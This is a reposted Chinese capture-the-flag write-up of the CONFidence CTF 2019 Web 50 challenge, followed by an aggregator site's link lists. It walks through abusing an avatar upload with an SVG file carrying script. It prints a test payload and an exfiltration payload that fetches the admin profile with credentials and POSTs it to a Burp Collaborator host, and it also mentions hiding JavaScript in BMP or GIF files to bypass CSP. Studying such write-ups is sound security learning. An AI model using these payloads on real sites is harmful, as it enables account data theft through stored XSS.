CONFidence CTF 2019-Web 50分析思考

其他 2020-09-12 10:43:02 阅读次数: 0

CONFidence CTF 2019-Web 50分析思考

当时没做出来,也有看到外国大师傅用缓存投毒非预期的。我还是太菜了orz。
Imgur
首先是一个非常简陋的登陆页面,随手输入一个没人用的用户名,即可注册登陆。
Imgur
两个功能,一个报告bug,一个修改个人信息。经过简单fuzz之后明显可以发现报告bug页面是管理员查看该域名下的某处页面。
Imgur
而修改个人信息页面的shoesize可以selfxss,因为如果没有cookie的话页面是不会解析的。且不能看到用户的secret。
Imgur
同样可以看到admin的信息,但是不能看到secret。同时看到cookie里面有http-only,说明打不了cookie。

还有一个上头像功能,fuzz发现可以改后缀,但是无论上传什么后缀的文件content-type都是图片。
Imgur
随机就想到几年前的洞:SVG XSS的一个黑魔法
其实当时不止想到这一个,还有bmp、gif,但是那些都不行,不知道为啥我本地都复现不了bmp、gif那两个。当然了那两个是将js代码伪装在bmp文件中,当

<script src="1.bmp"></script>

引入的时候相当于执行了上传的js文件,这个可以用于绕过csp。
参考文章:https://blog.csdn.net/qq_27446553/article/details/45498489

而svg就不一样了。来看看svg到底是什么吧:https://zhuanlan.zhihu.com/p/36138381d
SVG 图像是矢量图像,可以无限缩放,而且在图像质量下降方面没有任何问题。为什么会这样呢?因为 SVG 图像是使用 XML 标记构建的,浏览器通过绘制每个点和线来打印它们,而不是用预定义的像素填充某些空间。这确保 SVG 图像可以适应不同的屏幕大小和分辨率,即使是那些尚未发明的。
由于是在 XML 中定义的,SVG 图像比 JPG 或 PNG 图像更灵活,而且我们可以使用 CSS 和 JavaScript 与它们进行交互。SVG 图像设置可以包含 CSS 和 JavaScript。
svg是在xml中定义的,所以可以执行xml代码,在xml代码里面嵌入css和js代码执行即可。
构造payload:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve">  <image id="image0" width="751" height="751" x="0" y="0"
    href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" />
<script>alert(1)</script>
</svg>

Imgur
测试成功。然后只要用js爬取http://web50.zajebistyc.tf/profile/admin 内容然后打到vps上。
最后在reportbug页面将图片地址提交进行csrf即可。

<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" width="100px" height="100px" viewBox="-12.5 -12.5 100 100" xml:space="preserve"> 
  ...
  <g>
    <polygon fill="#00B0D9" points="41.5,40 38.7,39.2 38.7,47.1 41.5,47.1 "></polygon>
    <script type="text/javascript">
      var xhr = new XMLHttpRequest();
      xhr.onreadystatechange = function() {
        if (xhr.readyState === 4) {
          var xhr2 = new XMLHttpRequest();
          xhr2.open("POST", "http://XXXX.burpcollaborator.net/");
          xhr2.send(xhr.responseText);
        }
      }   
      xhr.open("GET", "http://web50.zajebistyc.tf/profile/admin");
      xhr.withCredentials = true;
      xhr.send();
    </script>
  </g>
  ...
</svg>

猜你喜欢

转载自blog.csdn.net/like98k/article/details/88702920
今日推荐
Linus “吃狗粮”最积极!
开源日报 | Winamp播放器即将开源;生成式AI之战升级第二轮;Linus“吃狗粮”最积极;AI进入泡沫前期;吴泳铭为阿里云带来了什么?
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
周排行
SVN服务端安装在阿里云
实战 | 相机标定
webpack核心概念
note20——》只要肯低头吃苦,人生就会有救
PAT甲级 1062 Talent and Virtue (25 分)排序
NG Toolset开发笔记--5GNR Resource Grid(26)
如何对待上司
oracle命令
第9章 STL迭代器
logstash使用es映射模板
每日归档
更多
2024-05-20(36)
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022